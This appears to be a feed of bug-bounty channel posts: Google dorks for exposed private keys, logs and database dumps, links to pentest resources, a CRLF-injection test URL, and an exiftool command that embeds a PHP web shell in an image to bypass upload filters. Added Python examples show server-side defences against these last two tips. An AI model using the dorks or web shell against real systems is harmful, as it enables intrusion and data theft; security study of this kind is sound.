🎉 Google Dorks for Bug Bounty
1-allintext:username filetype:log
2-inurl:/proc/self/cwd
3-intitle:"index of" inurl:ftp
4-filetype:log username putty
5-filetype:xls inurl:"email.xls"
6-intitle:index.of id_rsa -id_rsa.pub
7-"index of" "database.sql.zip"
8-intitle:"Index of" wp-admin
9-intitle:"Apache2 Ubuntu Default Page: It works"
10-"Index of" inurl:phpmyadmin
11-inurl:Dashboard.jspa intext:"Atlassian Jira Project Management Software"
12-inurl:app/kibana intext:Loading Kibana
13-inurl:_cpanel/forgotpwd
14-allintitle: restricted filetype:doc site:gov
#bugbountytips
✨What do you prefer In any Educational/Tutorial Video ? 👇
Anonymous Poll
43%
Low Lofi / Soft Music in Background
57%
No Music at All. Just Speak
☃️Red Teaming Pentest Checklist☃️
➡️ Windows Privilege Escalation
➡️ Lateral Movement
➡️ Domain Persistence
and much more...
🔗 Link: https://github.com/netbiosX/Checklists
#bugbounty #infosec #hacking #cybersecurity
🌟Offensive Recon for Bug Bounty Hunters
• By @harshbothra_
• PPT : https://speakerdeck.com/harshbothra/offensive-recon-for-bug-bounty-hunters
#bugbounty #infosec #cybersecurity
💥FREE labs to practice mobile app pentesting 👇🏻
>. https://code.google.com/archive/p/dvaa/
>. https://github.com/prateek147/DVIA-v2
>. https://securitycompass.github.io/iPhoneLabs/
>. https://code.google.com/archive/p/owasp-igoat/
>. https://maddiestone.github.io/AndroidAppRE/
>. https://ctf.hpandro.raviramesh.info/
#bugbounty #infosec #hacking #cybersecurity #bugbountytips
🔍 Search Engines Mostly Used by Hackers
1. Fofa.so
2. Wigle.net
3. Hunter.io
4. Shodan.io
5. Onyphe.io
6. Zoomeye.org
7. Ghostproject.fr
8. App.binaryedge.io
9. Viz.Greynoise.io/table
🦸Bug Bounty Playlist From Another Amazing Hacker :
https://youtube.com/playlist?list=PLM4kqXhW2ZOFdoUPImshvTqScacTlHgnq
#bugbounty #infosec #cybersecurity #hacking
🔥💥 HTTP Desync Attack (Request Smuggling) - Mass Account Takeover at a Cryptocurrency based asset and 121 other websites 🔯✅🦸
Link : https://github.com/AnkitCuriosity/Write-Ups/blob/main/HTTP%20Desync%20Attack%20(Request%20Smuggling).md
Which Software You Use for Virtual Machine ?
Anonymous Poll
56%
Vmware
37%
Oracle's Virtual Box
3%
Hyper-v
5%
Other
I love ❤️ all of you so much
Here are the license keys for VMware Workstation Pro 17 :
No limit to avail; these license keys can be used multiple times
Bug Bounty Reports in Thread 🧵
Bug : GitHub For Bypassing Filtration of HTML tags [ Part - 1 ]
#bugbounty #infosec #hacking #cybersecurity
Bounty : $10000
Link : https://twitter.com/Vuln_Reports/status/1595017974045294594?s=20&t=BKUJh2QGdnwZ3jmwFwbbhQ
Check For CRLF injection in it 🎉
When a webapp redirects you from http to https
For example: http://example.com/%0d%0aTest:%20Test
and at the same time watch the 301 and 302 responses in your browser developer tools' Network tab and check the headers 😃
#bugbounty #infosec
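Why the redirect in the CRLF tip above matters, and the fix on the server side, as an added example that is not part of the original post. The function names are hypothetical and the handler is assumed to receive only the path part of the request URL; the sample path is the one from the post.

```python
from urllib.parse import quote, unquote

SAMPLE_PATH = "/%0d%0aTest:%20Test"  # path from the post's example URL


def location_unsafe(host, raw_path):
    """Flawed pattern: decode the path, then reflect it into Location."""
    return "https://" + host + unquote(raw_path)


def location_safe(host, raw_path):
    """Reject control characters after decoding, then re-encode the path."""
    path = unquote(raw_path)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in path):
        raise ValueError("control character in redirect path")
    return "https://" + host + quote(path, safe="/")


def response_headers(location):
    """Build the 301 response head and parse it the way a client would."""
    raw = ("HTTP/1.1 301 Moved Permanently\r\n"
           "Location: " + location + "\r\n"
           "Content-Length: 0\r\n\r\n")
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")[1:]  # skip the status line
    return dict(line.split(": ", 1) for line in lines if ": " in line)


def demo():
    """Return (headers from the flawed handler, result of the hardened one)."""
    injected = response_headers(location_unsafe("example.com", SAMPLE_PATH))
    try:
        hardened = location_safe("example.com", SAMPLE_PATH)
    except ValueError as exc:
        hardened = "rejected: " + str(exc)
    return injected, hardened


if __name__ == "__main__":
    print(demo())
```

An extra header named Test in the parsed response is the sign the post tells you to look for; the hardened handler refuses the request before a Location value is built.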
All Security Assessment Wordlists in One Place 📃 : 👇
• https://github.com/danielmiessler/SecLists
• https://github.com/Dormidera/WordList-Compendium
• https://github.com/kaonashi-passwords/Kaonashi
• https://github.com/google/fuzzing/tree/master/dictionaries
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
#bugbounty #Infosec
General Discussion On :
IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA
Link : https://youtu.be/kwePER0er84
#bugbounty #infosec #cybersecurity
YouTube
BUG BOUNTY - IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA ||ZERO DAY EP 02
Cyberhawk Security session with guest HARSH BOTHRA and host NJAY.
👽TOPICS WE COVERED :
-Life/Career Journey
-Bug Bounty
-IDOR, CSRF, ACCOUNT TAKEOVERS
-Vulnerability Chaining
-Vulns and Methodology
-Red-Team
-How to become a Synack Red Teamer
CONNECT…
Bypass File Upload Filtering :
In image :
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
mv shell.jpg shell.php.jpg
#bugbountytip #infosec #cybersecuritytips
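The server-side checks that stop the upload trick above, as an added example that is not part of the original post: refuse names with more than one extension, store the file under a server-chosen name, and drop the JPEG comment and EXIF segments before saving. Function names and the sample bytes are constructed for illustration.

```python
import os
import secrets
import struct

ALLOWED_EXT = {"jpg", "jpeg"}
COMMENT = b"constructed comment standing in for injected text"
# Constructed minimal JPEG-like stream: SOI, APP0 (JFIF), COM, SOS, EOI.
SAMPLE = (b"\xff\xd8"
          + b"\xff\xe0" + struct.pack(">H", 16)
          + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
          + b"\xff\xfe" + struct.pack(">H", len(COMMENT) + 2) + COMMENT
          + b"\xff\xda\x00\x02\x00\xff\xd9")


def stored_name(filename):
    """Accept only name.ext with one allowlisted extension; return a random name."""
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) != 2 or not parts[0] or parts[1] not in ALLOWED_EXT:
        raise ValueError("upload must have exactly one allowlisted extension")
    return secrets.token_hex(16) + ".jpg"


def strip_jpeg_metadata(data):
    """Return the JPEG without COM and APP1..APP15 segments (comments, EXIF).

    APP2/APP14 can carry colour profiles, so colours may shift slightly.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    out = bytearray(b"\xff\xd8")
    i = 2
    while i + 4 <= len(data):
        if data[i] != 0xFF:
            raise ValueError("corrupt segment marker")
        marker = data[i + 1]
        if marker == 0xDA:  # start of scan: the rest is image data
            return bytes(out + data[i:])
        (length,) = struct.unpack(">H", data[i + 2:i + 4])
        if length < 2 or i + 2 + length > len(data):
            raise ValueError("bad segment length")
        if not (marker == 0xFE or 0xE1 <= marker <= 0xEF):
            out += data[i:i + 2 + length]
        i += 2 + length
    raise ValueError("no image data found")


if __name__ == "__main__":
    print(stored_name("photo.jpg"), len(strip_jpeg_metadata(SAMPLE)))
```

Stripping metadata does not inspect the image data itself, so uploads should also be served from a location where the web server never executes files.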